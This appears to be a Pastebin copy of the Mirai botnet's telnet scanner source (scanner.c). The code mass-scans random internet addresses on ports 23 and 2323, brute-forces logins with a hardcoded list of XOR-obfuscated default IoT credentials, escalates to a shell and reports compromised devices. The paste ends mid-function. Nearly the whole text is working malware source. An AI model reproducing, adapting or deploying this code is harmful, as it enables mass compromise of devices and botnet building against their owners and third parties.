API tools faq
paste
Advertisement
Guest User

Mirai

a guest
Oct 21st, 2016
730
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 36.93 KB | None | 0 0
raw download clone embed print report
  1. Code Issues 3 Pull requests 3 Pulse
  2. mirai/bot/scanner.c
  3.  
  4. #define _GNU_SOURCE
  5.  
  6. #ifdef MIRAI_TELNET
  7.  
  8. #ifdef DEBUG
  9. #include <stdio.h>
  10. #endif
  11. #include <unistd.h>
  12. #include <stdlib.h>
  13. #include <sys/socket.h>
  14. #include <arpa/inet.h>
  15. #include <sys/select.h>
  16. #include <sys/types.h>
  17. #include <time.h>
  18. #include <fcntl.h>
  19. #include <signal.h>
  20. #include <errno.h>
  21. #include <string.h>
  22. #include <linux/ip.h>
  23. #include <linux/tcp.h>
  24.  
  25. #include "includes.h"
  26. #include "scanner.h"
  27. #include "table.h"
  28. #include "rand.h"
  29. #include "util.h"
  30. #include "checksum.h"
  31. #include "resolv.h"
  32.  
  33. int scanner_pid, rsck, rsck_out, auth_table_len = 0;
  34. char scanner_rawpkt[sizeof (struct iphdr) + sizeof (struct tcphdr)] = {0};
  35. struct scanner_auth *auth_table = NULL;
  36. struct scanner_connection *conn_table;
  37. uint16_t auth_table_max_weight = 0;
  38. uint32_t fake_time = 0;
  39.  
  40. int recv_strip_null(int sock, void *buf, int len, int flags)
  41. {
  42. int ret = recv(sock, buf, len, flags);
  43.  
  44. if (ret > 0)
  45. {
  46. int i = 0;
  47.  
  48. for(i = 0; i < ret; i++)
  49. {
  50. if (((char *)buf)[i] == 0x00)
  51. {
  52. ((char *)buf)[i] = 'A';
  53. }
  54. }
  55. }
  56.  
  57. return ret;
  58. }
  59.  
  60. void scanner_init(void)
  61. {
  62. int i;
  63. uint16_t source_port;
  64. struct iphdr *iph;
  65. struct tcphdr *tcph;
  66.  
  67. // Let parent continue on main thread
  68. scanner_pid = fork();
  69. if (scanner_pid > 0 || scanner_pid == -1)
  70. return;
  71.  
  72. LOCAL_ADDR = util_local_addr();
  73.  
  74. rand_init();
  75. fake_time = time(NULL);
  76. conn_table = calloc(SCANNER_MAX_CONNS, sizeof (struct scanner_connection));
  77. for (i = 0; i < SCANNER_MAX_CONNS; i++)
  78. {
  79. conn_table[i].state = SC_CLOSED;
  80. conn_table[i].fd = -1;
  81. }
  82.  
  83. // Set up raw socket scanning and payload
  84. if ((rsck = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
  85. {
  86. #ifdef DEBUG
  87. printf("[scanner] Failed to initialize raw socket, cannot scan\n");
  88. #endif
  89. exit(0);
  90. }
  91. fcntl(rsck, F_SETFL, O_NONBLOCK | fcntl(rsck, F_GETFL, 0));
  92. i = 1;
  93. if (setsockopt(rsck, IPPROTO_IP, IP_HDRINCL, &i, sizeof (i)) != 0)
  94. {
  95. #ifdef DEBUG
  96. printf("[scanner] Failed to set IP_HDRINCL, cannot scan\n");
  97. #endif
  98. close(rsck);
  99. exit(0);
  100. }
  101.  
  102. do
  103. {
  104. source_port = rand_next() & 0xffff;
  105. }
  106. while (ntohs(source_port) < 1024);
  107.  
  108. iph = (struct iphdr *)scanner_rawpkt;
  109. tcph = (struct tcphdr *)(iph + 1);
  110.  
  111. // Set up IPv4 header
  112. iph->ihl = 5;
  113. iph->version = 4;
  114. iph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct tcphdr));
  115. iph->id = rand_next();
  116. iph->ttl = 64;
  117. iph->protocol = IPPROTO_TCP;
  118.  
  119. // Set up TCP header
  120. tcph->dest = htons(23);
  121. tcph->source = source_port;
  122. tcph->doff = 5;
  123. tcph->window = rand_next() & 0xffff;
  124. tcph->syn = TRUE;
  125.  
  126. // Set up passwords
  127. add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x41\x11\x17\x13\x13", 10); // root xc3511
  128. add_auth_entry("\x50\x4D\x4D\x56", "\x54\x4B\x58\x5A\x54", 9); // root vizxv
  129. add_auth_entry("\x50\x4D\x4D\x56", "\x43\x46\x4F\x4B\x4C", 8); // root admin
  130. add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x43\x46\x4F\x4B\x4C", 7); // admin admin
  131. add_auth_entry("\x50\x4D\x4D\x56", "\x1A\x1A\x1A\x1A\x1A\x1A", 6); // root 888888
  132. add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x4F\x4A\x46\x4B\x52\x41", 5); // root xmhdipc
  133. add_auth_entry("\x50\x4D\x4D\x56", "\x46\x47\x44\x43\x57\x4E\x56", 5); // root default
  134. add_auth_entry("\x50\x4D\x4D\x56", "\x48\x57\x43\x4C\x56\x47\x41\x4A", 5); // root juantech
  135. add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16\x17\x14", 5); // root 123456
  136. add_auth_entry("\x50\x4D\x4D\x56", "\x17\x16\x11\x10\x13", 5); // root 54321
  137. add_auth_entry("\x51\x57\x52\x52\x4D\x50\x56", "\x51\x57\x52\x52\x4D\x50\x56", 5); // support support
  138. add_auth_entry("\x50\x4D\x4D\x56", "", 4); // root (none)
  139. add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x52\x43\x51\x51\x55\x4D\x50\x46", 4); // admin password
  140. add_auth_entry("\x50\x4D\x4D\x56", "\x50\x4D\x4D\x56", 4); // root root
  141. add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16\x17", 4); // root 12345
  142. add_auth_entry("\x57\x51\x47\x50", "\x57\x51\x47\x50", 3); // user user
  143. add_auth_entry("\x43\x46\x4F\x4B\x4C", "", 3); // admin (none)
  144. add_auth_entry("\x50\x4D\x4D\x56", "\x52\x43\x51\x51", 3); // root pass
  145. add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x43\x46\x4F\x4B\x4C\x13\x10\x11\x16", 3); // admin admin1234
  146. add_auth_entry("\x50\x4D\x4D\x56", "\x13\x13\x13\x13", 3); // root 1111
  147. add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x51\x4F\x41\x43\x46\x4F\x4B\x4C", 3); // admin smcadmin
  148. add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x13\x13\x13", 2); // admin 1111
  149. add_auth_entry("\x50\x4D\x4D\x56", "\x14\x14\x14\x14\x14\x14", 2); // root 666666
  150. add_auth_entry("\x50\x4D\x4D\x56", "\x52\x43\x51\x51\x55\x4D\x50\x46", 2); // root password
  151. add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16", 2); // root 1234
  152. add_auth_entry("\x50\x4D\x4D\x56", "\x49\x4E\x54\x13\x10\x11", 1); // root klv123
  153. add_auth_entry("\x63\x46\x4F\x4B\x4C\x4B\x51\x56\x50\x43\x56\x4D\x50", "\x4F\x47\x4B\x4C\x51\x4F", 1); // Administrator admin
  154. add_auth_entry("\x51\x47\x50\x54\x4B\x41\x47", "\x51\x47\x50\x54\x4B\x41\x47", 1); // service service
  155. add_auth_entry("\x51\x57\x52\x47\x50\x54\x4B\x51\x4D\x50", "\x51\x57\x52\x47\x50\x54\x4B\x51\x4D\x50", 1); // supervisor supervisor
  156. add_auth_entry("\x45\x57\x47\x51\x56", "\x45\x57\x47\x51\x56", 1); // guest guest
  157. add_auth_entry("\x45\x57\x47\x51\x56", "\x13\x10\x11\x16\x17", 1); // guest 12345
  158. add_auth_entry("\x45\x57\x47\x51\x56", "\x13\x10\x11\x16\x17", 1); // guest 12345
  159. add_auth_entry("\x43\x46\x4F\x4B\x4C\x13", "\x52\x43\x51\x51\x55\x4D\x50\x46", 1); // admin1 password
  160. add_auth_entry("\x43\x46\x4F\x4B\x4C\x4B\x51\x56\x50\x43\x56\x4D\x50", "\x13\x10\x11\x16", 1); // administrator 1234
  161. add_auth_entry("\x14\x14\x14\x14\x14\x14", "\x14\x14\x14\x14\x14\x14", 1); // 666666 666666
  162. add_auth_entry("\x1A\x1A\x1A\x1A\x1A\x1A", "\x1A\x1A\x1A\x1A\x1A\x1A", 1); // 888888 888888
  163. add_auth_entry("\x57\x40\x4C\x56", "\x57\x40\x4C\x56", 1); // ubnt ubnt
  164. add_auth_entry("\x50\x4D\x4D\x56", "\x49\x4E\x54\x13\x10\x11\x16", 1); // root klv1234
  165. add_auth_entry("\x50\x4D\x4D\x56", "\x78\x56\x47\x17\x10\x13", 1); // root Zte521
  166. add_auth_entry("\x50\x4D\x4D\x56", "\x4A\x4B\x11\x17\x13\x1A", 1); // root hi3518
  167. add_auth_entry("\x50\x4D\x4D\x56", "\x48\x54\x40\x58\x46", 1); // root jvbzd
  168. add_auth_entry("\x50\x4D\x4D\x56", "\x43\x4C\x49\x4D", 4); // root anko
  169. add_auth_entry("\x50\x4D\x4D\x56", "\x58\x4E\x5A\x5A\x0C", 1); // root zlxx.
  170. add_auth_entry("\x50\x4D\x4D\x56", "\x15\x57\x48\x6F\x49\x4D\x12\x54\x4B\x58\x5A\x54", 1); // root 7ujMko0vizxv
  171. add_auth_entry("\x50\x4D\x4D\x56", "\x15\x57\x48\x6F\x49\x4D\x12\x43\x46\x4F\x4B\x4C", 1); // root 7ujMko0admin
  172. add_auth_entry("\x50\x4D\x4D\x56", "\x51\x5B\x51\x56\x47\x4F", 1); // root system
  173. add_auth_entry("\x50\x4D\x4D\x56", "\x4B\x49\x55\x40", 1); // root ikwb
  174. add_auth_entry("\x50\x4D\x4D\x56", "\x46\x50\x47\x43\x4F\x40\x4D\x5A", 1); // root dreambox
  175. add_auth_entry("\x50\x4D\x4D\x56", "\x57\x51\x47\x50", 1); // root user
  176. add_auth_entry("\x50\x4D\x4D\x56", "\x50\x47\x43\x4E\x56\x47\x49", 1); // root realtek
  177. add_auth_entry("\x50\x4D\x4D\x56", "\x12\x12\x12\x12\x12\x12\x12\x12", 1); // root 00000000
  178. add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x13\x13\x13\x13\x13\x13", 1); // admin 1111111
  179. add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x10\x11\x16", 1); // admin 1234
  180. add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x10\x11\x16\x17", 1); // admin 12345
  181. add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x17\x16\x11\x10\x13", 1); // admin 54321
  182. add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x10\x11\x16\x17\x14", 1); // admin 123456
  183. add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x15\x57\x48\x6F\x49\x4D\x12\x43\x46\x4F\x4B\x4C", 1); // admin 7ujMko0admin
  184. add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x16\x11\x10\x13", 1); // admin 1234
  185. add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x52\x43\x51\x51", 1); // admin pass
  186. add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x4F\x47\x4B\x4C\x51\x4F", 1); // admin meinsm
  187. add_auth_entry("\x56\x47\x41\x4A", "\x56\x47\x41\x4A", 1); // tech tech
  188. add_auth_entry("\x4F\x4D\x56\x4A\x47\x50", "\x44\x57\x41\x49\x47\x50", 1); // mother fucker
  189.  
  190.  
  191. #ifdef DEBUG
  192. printf("[scanner] Scanner process initialized. Scanning started.\n");
  193. #endif
  194.  
  195. // Main logic loop
  196. while (TRUE)
  197. {
  198. fd_set fdset_rd, fdset_wr;
  199. struct scanner_connection *conn;
  200. struct timeval tim;
  201. int last_avail_conn, last_spew, mfd_rd = 0, mfd_wr = 0, nfds;
  202.  
  203. // Spew out SYN to try and get a response
  204. if (fake_time != last_spew)
  205. {
  206. last_spew = fake_time;
  207.  
  208. for (i = 0; i < SCANNER_RAW_PPS; i++)
  209. {
  210. struct sockaddr_in paddr = {0};
  211. struct iphdr *iph = (struct iphdr *)scanner_rawpkt;
  212. struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
  213.  
  214. iph->id = rand_next();
  215. iph->saddr = LOCAL_ADDR;
  216. iph->daddr = get_random_ip();
  217. iph->check = 0;
  218. iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));
  219.  
  220. if (i % 10 == 0)
  221. {
  222. tcph->dest = htons(2323);
  223. }
  224. else
  225. {
  226. tcph->dest = htons(23);
  227. }
  228. tcph->seq = iph->daddr;
  229. tcph->check = 0;
  230. tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof (struct tcphdr)), sizeof (struct tcphdr));
  231.  
  232. paddr.sin_family = AF_INET;
  233. paddr.sin_addr.s_addr = iph->daddr;
  234. paddr.sin_port = tcph->dest;
  235.  
  236. sendto(rsck, scanner_rawpkt, sizeof (scanner_rawpkt), MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof (paddr));
  237. }
  238. }
  239.  
  240. // Read packets from raw socket to get SYN+ACKs
  241. last_avail_conn = 0;
  242. while (TRUE)
  243. {
  244. int n;
  245. char dgram[1514];
  246. struct iphdr *iph = (struct iphdr *)dgram;
  247. struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
  248. struct scanner_connection *conn;
  249.  
  250. errno = 0;
  251. n = recvfrom(rsck, dgram, sizeof (dgram), MSG_NOSIGNAL, NULL, NULL);
  252. if (n <= 0 || errno == EAGAIN || errno == EWOULDBLOCK)
  253. break;
  254.  
  255. if (n < sizeof(struct iphdr) + sizeof(struct tcphdr))
  256. continue;
  257. if (iph->daddr != LOCAL_ADDR)
  258. continue;
  259. if (iph->protocol != IPPROTO_TCP)
  260. continue;
  261. if (tcph->source != htons(23) && tcph->source != htons(2323))
  262. continue;
  263. if (tcph->dest != source_port)
  264. continue;
  265. if (!tcph->syn)
  266. continue;
  267. if (!tcph->ack)
  268. continue;
  269. if (tcph->rst)
  270. continue;
  271. if (tcph->fin)
  272. continue;
  273. if (htonl(ntohl(tcph->ack_seq) - 1) != iph->saddr)
  274. continue;
  275.  
  276. conn = NULL;
  277. for (n = last_avail_conn; n < SCANNER_MAX_CONNS; n++)
  278. {
  279. if (conn_table[n].state == SC_CLOSED)
  280. {
  281. conn = &conn_table[n];
  282. last_avail_conn = n;
  283. break;
  284. }
  285. }
  286.  
  287. // If there were no slots, then no point reading any more
  288. if (conn == NULL)
  289. break;
  290.  
  291. conn->dst_addr = iph->saddr;
  292. conn->dst_port = tcph->source;
  293. setup_connection(conn);
  294. #ifdef DEBUG
  295. printf("[scanner] FD%d Attempting to brute found IP %d.%d.%d.%d\n", conn->fd, iph->saddr & 0xff, (iph->saddr >> 8) & 0xff, (iph->saddr >> 16) & 0xff, (iph->saddr >> 24) & 0xff);
  296. #endif
  297. }
  298.  
  299. // Load file descriptors into fdsets
  300. FD_ZERO(&fdset_rd);
  301. FD_ZERO(&fdset_wr);
  302. for (i = 0; i < SCANNER_MAX_CONNS; i++)
  303. {
  304. int timeout;
  305.  
  306. conn = &conn_table[i];
  307. timeout = (conn->state > SC_CONNECTING ? 30 : 5);
  308.  
  309. if (conn->state != SC_CLOSED && (fake_time - conn->last_recv) > timeout)
  310. {
  311. #ifdef DEBUG
  312. printf("[scanner] FD%d timed out (state = %d)\n", conn->fd, conn->state);
  313. #endif
  314. close(conn->fd);
  315. conn->fd = -1;
  316.  
  317. // Retry
  318. if (conn->state > SC_HANDLE_IACS) // If we were at least able to connect, try again
  319. {
  320. if (++(conn->tries) == 10)
  321. {
  322. conn->tries = 0;
  323. conn->state = SC_CLOSED;
  324. }
  325. else
  326. {
  327. setup_connection(conn);
  328. #ifdef DEBUG
  329. printf("[scanner] FD%d retrying with different auth combo!\n", conn->fd);
  330. #endif
  331. }
  332. }
  333. else
  334. {
  335. conn->tries = 0;
  336. conn->state = SC_CLOSED;
  337. }
  338. continue;
  339. }
  340.  
  341. if (conn->state == SC_CONNECTING)
  342. {
  343. FD_SET(conn->fd, &fdset_wr);
  344. if (conn->fd > mfd_wr)
  345. mfd_wr = conn->fd;
  346. }
  347. else if (conn->state != SC_CLOSED)
  348. {
  349. FD_SET(conn->fd, &fdset_rd);
  350. if (conn->fd > mfd_rd)
  351. mfd_rd = conn->fd;
  352. }
  353. }
  354.  
  355. tim.tv_usec = 0;
  356. tim.tv_sec = 1;
  357. nfds = select(1 + (mfd_wr > mfd_rd ? mfd_wr : mfd_rd), &fdset_rd, &fdset_wr, NULL, &tim);
  358. fake_time = time(NULL);
  359.  
  360. for (i = 0; i < SCANNER_MAX_CONNS; i++)
  361. {
  362. conn = &conn_table[i];
  363.  
  364. if (conn->fd == -1)
  365. continue;
  366.  
  367. if (FD_ISSET(conn->fd, &fdset_wr))
  368. {
  369. int err = 0, ret = 0;
  370. socklen_t err_len = sizeof (err);
  371.  
  372. ret = getsockopt(conn->fd, SOL_SOCKET, SO_ERROR, &err, &err_len);
  373. if (err == 0 && ret == 0)
  374. {
  375. conn->state = SC_HANDLE_IACS;
  376. conn->auth = random_auth_entry();
  377. conn->rdbuf_pos = 0;
  378. #ifdef DEBUG
  379. printf("[scanner] FD%d connected. Trying %s:%s\n", conn->fd, conn->auth->username, conn->auth->password);
  380. #endif
  381. }
  382. else
  383. {
  384. #ifdef DEBUG
  385. printf("[scanner] FD%d error while connecting = %d\n", conn->fd, err);
  386. #endif
  387. close(conn->fd);
  388. conn->fd = -1;
  389. conn->tries = 0;
  390. conn->state = SC_CLOSED;
  391. continue;
  392. }
  393. }
  394.  
  395. if (FD_ISSET(conn->fd, &fdset_rd))
  396. {
  397. while (TRUE)
  398. {
  399. int ret;
  400.  
  401. if (conn->state == SC_CLOSED)
  402. break;
  403.  
  404. if (conn->rdbuf_pos == SCANNER_RDBUF_SIZE)
  405. {
  406. memmove(conn->rdbuf, conn->rdbuf + SCANNER_HACK_DRAIN, SCANNER_RDBUF_SIZE - SCANNER_HACK_DRAIN);
  407. conn->rdbuf_pos -= SCANNER_HACK_DRAIN;
  408. }
  409. errno = 0;
  410. ret = recv_strip_null(conn->fd, conn->rdbuf + conn->rdbuf_pos, SCANNER_RDBUF_SIZE - conn->rdbuf_pos, MSG_NOSIGNAL);
  411. if (ret == 0)
  412. {
  413. #ifdef DEBUG
  414. printf("[scanner] FD%d connection gracefully closed\n", conn->fd);
  415. #endif
  416. errno = ECONNRESET;
  417. ret = -1; // Fall through to closing connection below
  418. }
  419. if (ret == -1)
  420. {
  421. if (errno != EAGAIN && errno != EWOULDBLOCK)
  422. {
  423. #ifdef DEBUG
  424. printf("[scanner] FD%d lost connection\n", conn->fd);
  425. #endif
  426. close(conn->fd);
  427. conn->fd = -1;
  428.  
  429. // Retry
  430. if (++(conn->tries) >= 10)
  431. {
  432. conn->tries = 0;
  433. conn->state = SC_CLOSED;
  434. }
  435. else
  436. {
  437. setup_connection(conn);
  438. #ifdef DEBUG
  439. printf("[scanner] FD%d retrying with different auth combo!\n", conn->fd);
  440. #endif
  441. }
  442. }
  443. break;
  444. }
  445. conn->rdbuf_pos += ret;
  446. conn->last_recv = fake_time;
  447.  
  448. while (TRUE)
  449. {
  450. int consumed = 0;
  451.  
  452. switch (conn->state)
  453. {
  454. case SC_HANDLE_IACS:
  455. if ((consumed = consume_iacs(conn)) > 0)
  456. {
  457. conn->state = SC_WAITING_USERNAME;
  458. #ifdef DEBUG
  459. printf("[scanner] FD%d finished telnet negotiation\n", conn->fd);
  460. #endif
  461. }
  462. break;
  463. case SC_WAITING_USERNAME:
  464. if ((consumed = consume_user_prompt(conn)) > 0)
  465. {
  466. send(conn->fd, conn->auth->username, conn->auth->username_len, MSG_NOSIGNAL);
  467. send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
  468. conn->state = SC_WAITING_PASSWORD;
  469. #ifdef DEBUG
  470. printf("[scanner] FD%d received username prompt\n", conn->fd);
  471. #endif
  472. }
  473. break;
  474. case SC_WAITING_PASSWORD:
  475. if ((consumed = consume_pass_prompt(conn)) > 0)
  476. {
  477. #ifdef DEBUG
  478. printf("[scanner] FD%d received password prompt\n", conn->fd);
  479. #endif
  480.  
  481. // Send password
  482. send(conn->fd, conn->auth->password, conn->auth->password_len, MSG_NOSIGNAL);
  483. send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
  484.  
  485. conn->state = SC_WAITING_PASSWD_RESP;
  486. }
  487. break;
  488. case SC_WAITING_PASSWD_RESP:
  489. if ((consumed = consume_any_prompt(conn)) > 0)
  490. {
  491. char *tmp_str;
  492. int tmp_len;
  493.  
  494. #ifdef DEBUG
  495. printf("[scanner] FD%d received shell prompt\n", conn->fd);
  496. #endif
  497.  
  498. // Send enable / system / shell / sh to session to drop into shell if needed
  499. table_unlock_val(TABLE_SCAN_ENABLE);
  500. tmp_str = table_retrieve_val(TABLE_SCAN_ENABLE, &tmp_len);
  501. send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);
  502. send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
  503. table_lock_val(TABLE_SCAN_ENABLE);
  504. conn->state = SC_WAITING_ENABLE_RESP;
  505. }
  506. break;
  507. case SC_WAITING_ENABLE_RESP:
  508. if ((consumed = consume_any_prompt(conn)) > 0)
  509. {
  510. char *tmp_str;
  511. int tmp_len;
  512.  
  513. #ifdef DEBUG
  514. printf("[scanner] FD%d received sh prompt\n", conn->fd);
  515. #endif
  516.  
  517. table_unlock_val(TABLE_SCAN_SYSTEM);
  518. tmp_str = table_retrieve_val(TABLE_SCAN_SYSTEM, &tmp_len);
  519. send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);
  520. send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
  521. table_lock_val(TABLE_SCAN_SYSTEM);
  522.  
  523. conn->state = SC_WAITING_SYSTEM_RESP;
  524. }
  525. break;
  526. case SC_WAITING_SYSTEM_RESP:
  527. if ((consumed = consume_any_prompt(conn)) > 0)
  528. {
  529. char *tmp_str;
  530. int tmp_len;
  531.  
  532. #ifdef DEBUG
  533. printf("[scanner] FD%d received sh prompt\n", conn->fd);
  534. #endif
  535.  
  536. table_unlock_val(TABLE_SCAN_SHELL);
  537. tmp_str = table_retrieve_val(TABLE_SCAN_SHELL, &tmp_len);
  538. send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);
  539. send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
  540. table_lock_val(TABLE_SCAN_SHELL);
  541.  
  542. conn->state = SC_WAITING_SHELL_RESP;
  543. }
  544. break;
  545. case SC_WAITING_SHELL_RESP:
  546. if ((consumed = consume_any_prompt(conn)) > 0)
  547. {
  548. char *tmp_str;
  549. int tmp_len;
  550.  
  551. #ifdef DEBUG
  552. printf("[scanner] FD%d received enable prompt\n", conn->fd);
  553. #endif
  554.  
  555. table_unlock_val(TABLE_SCAN_SH);
  556. tmp_str = table_retrieve_val(TABLE_SCAN_SH, &tmp_len);
  557. send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);
  558. send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
  559. table_lock_val(TABLE_SCAN_SH);
  560.  
  561. conn->state = SC_WAITING_SH_RESP;
  562. }
  563. break;
  564. case SC_WAITING_SH_RESP:
  565. if ((consumed = consume_any_prompt(conn)) > 0)
  566. {
  567. char *tmp_str;
  568. int tmp_len;
  569.  
  570. #ifdef DEBUG
  571. printf("[scanner] FD%d received sh prompt\n", conn->fd);
  572. #endif
  573.  
  574. // Send query string
  575. table_unlock_val(TABLE_SCAN_QUERY);
  576. tmp_str = table_retrieve_val(TABLE_SCAN_QUERY, &tmp_len);
  577. send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);
  578. send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
  579. table_lock_val(TABLE_SCAN_QUERY);
  580.  
  581. conn->state = SC_WAITING_TOKEN_RESP;
  582. }
  583. break;
  584. case SC_WAITING_TOKEN_RESP:
  585. consumed = consume_resp_prompt(conn);
  586. if (consumed == -1)
  587. {
  588. #ifdef DEBUG
  589. printf("[scanner] FD%d invalid username/password combo\n", conn->fd);
  590. #endif
  591. close(conn->fd);
  592. conn->fd = -1;
  593.  
  594. // Retry
  595. if (++(conn->tries) == 10)
  596. {
  597. conn->tries = 0;
  598. conn->state = SC_CLOSED;
  599. }
  600. else
  601. {
  602. setup_connection(conn);
  603. #ifdef DEBUG
  604. printf("[scanner] FD%d retrying with different auth combo!\n", conn->fd);
  605. #endif
  606. }
  607. }
  608. else if (consumed > 0)
  609. {
  610. char *tmp_str;
  611. int tmp_len;
  612. #ifdef DEBUG
  613. printf("[scanner] FD%d Found verified working telnet\n", conn->fd);
  614. #endif
  615. report_working(conn->dst_addr, conn->dst_port, conn->auth);
  616. close(conn->fd);
  617. conn->fd = -1;
  618. conn->state = SC_CLOSED;
  619. }
  620. break;
  621. default:
  622. consumed = 0;
  623. break;
  624. }
  625.  
  626. // If no data was consumed, move on
  627. if (consumed == 0)
  628. break;
  629. else
  630. {
  631. if (consumed > conn->rdbuf_pos)
  632. consumed = conn->rdbuf_pos;
  633.  
  634. conn->rdbuf_pos -= consumed;
  635. memmove(conn->rdbuf, conn->rdbuf + consumed, conn->rdbuf_pos);
  636. }
  637. }
  638. }
  639. }
  640. }
  641. }
  642. }
  643.  
  644. void scanner_kill(void)
  645. {
  646. kill(scanner_pid, 9);
  647. }
  648.  
  649. static void setup_connection(struct scanner_connection *conn)
  650. {
  651. struct sockaddr_in addr = {0};
  652.  
  653. if (conn->fd != -1)
  654. close(conn->fd);
  655. if ((conn->fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
  656. {
  657. #ifdef DEBUG
  658. printf("[scanner] Failed to call socket()\n");
  659. #endif
  660. return;
  661. }
  662.  
  663. conn->rdbuf_pos = 0;
  664. util_zero(conn->rdbuf, sizeof(conn->rdbuf));
  665.  
  666. fcntl(conn->fd, F_SETFL, O_NONBLOCK | fcntl(conn->fd, F_GETFL, 0));
  667.  
  668. addr.sin_family = AF_INET;
  669. addr.sin_addr.s_addr = conn->dst_addr;
  670. addr.sin_port = conn->dst_port;
  671.  
  672. conn->last_recv = fake_time;
  673. conn->state = SC_CONNECTING;
  674. connect(conn->fd, (struct sockaddr *)&addr, sizeof (struct sockaddr_in));
  675. }
  676.  
  677. static ipv4_t get_random_ip(void)
  678. {
  679. uint32_t tmp;
  680. uint8_t o1, o2, o3, o4;
  681.  
  682. do
  683. {
  684. tmp = rand_next();
  685.  
  686. o1 = tmp & 0xff;
  687. o2 = (tmp >> 8) & 0xff;
  688. o3 = (tmp >> 16) & 0xff;
  689. o4 = (tmp >> 24) & 0xff;
  690. }
  691. while (o1 == 127 || // 127.0.0.0/8 - Loopback
  692. (o1 == 0) || // 0.0.0.0/8 - Invalid address space
  693. (o1 == 3) || // 3.0.0.0/8 - General Electric Company
  694. (o1 == 15 || o1 == 16) || // 15.0.0.0/7 - Hewlett-Packard Company
  695. (o1 == 56) || // 56.0.0.0/8 - US Postal Service
  696. (o1 == 10) || // 10.0.0.0/8 - Internal network
  697. (o1 == 192 && o2 == 168) || // 192.168.0.0/16 - Internal network
  698. (o1 == 172 && o2 >= 16 && o2 < 32) || // 172.16.0.0/14 - Internal network
  699. (o1 == 100 && o2 >= 64 && o2 < 127) || // 100.64.0.0/10 - IANA NAT reserved
  700. (o1 == 169 && o2 > 254) || // 169.254.0.0/16 - IANA NAT reserved
  701. (o1 == 198 && o2 >= 18 && o2 < 20) || // 198.18.0.0/15 - IANA Special use
  702. (o1 >= 224) || // 224.*.*.*+ - Multicast
  703. (o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense
  704. );
  705.  
  706. return INET_ADDR(o1,o2,o3,o4);
  707. }
  708.  
  709. static int consume_iacs(struct scanner_connection *conn)
  710. {
  711. int consumed = 0;
  712. uint8_t *ptr = conn->rdbuf;
  713.  
  714. while (consumed < conn->rdbuf_pos)
  715. {
  716. int i;
  717.  
  718. if (*ptr != 0xff)
  719. break;
  720. else if (*ptr == 0xff)
  721. {
  722. if (!can_consume(conn, ptr, 1))
  723. break;
  724. if (ptr[1] == 0xff)
  725. {
  726. ptr += 2;
  727. consumed += 2;
  728. continue;
  729. }
  730. else if (ptr[1] == 0xfd)
  731. {
  732. uint8_t tmp1[3] = {255, 251, 31};
  733. uint8_t tmp2[9] = {255, 250, 31, 0, 80, 0, 24, 255, 240};
  734.  
  735. if (!can_consume(conn, ptr, 2))
  736. break;
  737. if (ptr[2] != 31)
  738. goto iac_wont;
  739.  
  740. ptr += 3;
  741. consumed += 3;
  742.  
  743. send(conn->fd, tmp1, 3, MSG_NOSIGNAL);
  744. send(conn->fd, tmp2, 9, MSG_NOSIGNAL);
  745. }
  746. else
  747. {
  748. iac_wont:
  749.  
  750. if (!can_consume(conn, ptr, 2))
  751. break;
  752.  
  753. for (i = 0; i < 3; i++)
  754. {
  755. if (ptr[i] == 0xfd)
  756. ptr[i] = 0xfc;
  757. else if (ptr[i] == 0xfb)
  758. ptr[i] = 0xfd;
  759. }
  760.  
  761. send(conn->fd, ptr, 3, MSG_NOSIGNAL);
  762. ptr += 3;
  763. consumed += 3;
  764. }
  765. }
  766. }
  767.  
  768. return consumed;
  769. }
  770.  
  771. static int consume_any_prompt(struct scanner_connection *conn)
  772. {
  773. char *pch;
  774. int i, prompt_ending = -1;
  775.  
  776. for (i = conn->rdbuf_pos - 1; i > 0; i--)
  777. {
  778. if (conn->rdbuf[i] == ':' || conn->rdbuf[i] == '>' || conn->rdbuf[i] == '$' || conn->rdbuf[i] == '#' || conn->rdbuf[i] == '%')
  779. {
  780. prompt_ending = i + 1;
  781. break;
  782. }
  783. }
  784.  
  785. if (prompt_ending == -1)
  786. return 0;
  787. else
  788. return prompt_ending;
  789. }
  790.  
  791. static int consume_user_prompt(struct scanner_connection *conn)
  792. {
  793. char *pch;
